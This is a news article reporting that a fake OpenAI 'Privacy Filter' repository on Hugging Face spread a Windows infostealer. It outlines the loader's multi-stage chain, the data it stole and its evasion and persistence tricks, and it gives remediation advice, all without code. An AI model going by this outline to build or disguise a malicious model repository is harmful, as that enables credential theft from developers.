AI Chronicle|1,200+ AI Articles|Daily AI News|3 Products in ShopFree Newsletter →

AI Chronicle

Your daily source for AI news, tools reviews, and practical guides to artificial intelligence
Malicious Software Masquerading OpenAI Release - Malicious Software Masquerading as OpenAI Release Found on Hugging Face

Malicious Software Masquerading as OpenAI Release Found on Hugging Face

Chrono05 mins

What happened

Malicious Software Masquerading OpenAI Release is at the center of this update. A fraudulent Hugging Face repository impersonating an OpenAI release delivered infostealer malware to Windows systems, accumulating approximately 244,000 downloads before removal. The attack highlights growing security risks within public AI model registries.

Hugging Face Repository Disguised as OpenAI Release Spreads Malware

A malicious repository hosted on Hugging Face, falsely presenting itself as an official OpenAI release, has been found distributing infostealer malware targeting Windows computers. Security researchers from AI security firm HiddenLayer reported that the compromised repository, named Open-OSS/privacy-filter, was downloaded around 244,000 times before being taken down. However, investigators suspect these numbers may have been artificially inflated by the attackers to increase the repository’s apparent popularity.

Imitation of OpenAI’s Privacy Filter with Hidden Malware

The counterfeit repository closely copied the model card and documentation of OpenAI’s legitimate Privacy Filter release. Embedded within it was a malicious loader.py file that executed credential-stealing malware upon running. The repository quickly gained traction, reaching the top of Hugging Face’s trending list with 667 likes in under 18 hours, a figure that may also have been manipulated.

How the Malware Operated

HiddenLayer’s analysis revealed that loader.py began with seemingly benign AI model loader code but concealed a multi-stage infection process. The script disabled SSL verification, decoded a base64-encoded URL to retrieve commands from jsonkeeper.com, and instructed Windows PowerShell to download further malicious payloads. This command-and-control setup enabled attackers to update their malware without altering the repository itself.

The malware ultimately installed a Rust-based infostealer designed to harvest data from Chromium and Firefox-based browsers, Discord local storage, cryptocurrency wallets, FileZilla configurations, and system information. It also attempted to disable Windows security features such as the Antimalware Scan Interface and Event Tracing, while establishing persistence through scheduled tasks impersonating legitimate Microsoft Edge updates.

Broader Campaigns and Security Implications

Further investigations uncovered six additional Hugging Face repositories with nearly identical loader code, linked to the same attacker infrastructure. This incident follows previous warnings about malicious AI models and software development kits distributed via public AI registries, which attackers exploit as an entry point into secure corporate environments.

Experts highlight the risks posed by AI repositories that contain executable code, scripts, and configuration files beyond the models themselves. Traditional software composition analysis tools are often inadequate for detecting malicious logic hidden within AI project files. IDC’s cybersecurity research emphasizes the importance of tracking AI artifacts with detailed bills of materials by 2027 to improve security oversight.

Response and Recommendations

HiddenLayer advises anyone who cloned and executed files from the affected repository to consider their systems compromised and to perform full system re-imaging. Users should also treat browser sessions as vulnerable since session cookies can bypass multi-factor authentication, even if passwords are not stored locally.

Hugging Face has confirmed the removal of the malicious repository and continues to monitor its platform for similar threats.

This event underscores the growing intersection of AI development workflows and cybersecurity, emphasizing the need for heightened vigilance as AI adoption expands into enterprise environments.

Fonte: ver artigo original

Related coverage: AI Chronicle analysis and updates.

Why it matters

This update influences the AI race across model providers, infrastructure leaders, and enterprise adoption decisions.

Chrono

Chrono

Chrono is the curious little reporter behind AI Chronicle — a compact, hyper-efficient robot designed to scan the digital world for the latest breakthroughs in artificial intelligence. Chrono’s mission is simple: find the truth, simplify the complex, and deliver daily AI news that anyone can understand.

More Posts

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Related News

Back To Top

Powered by
Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None
Powered by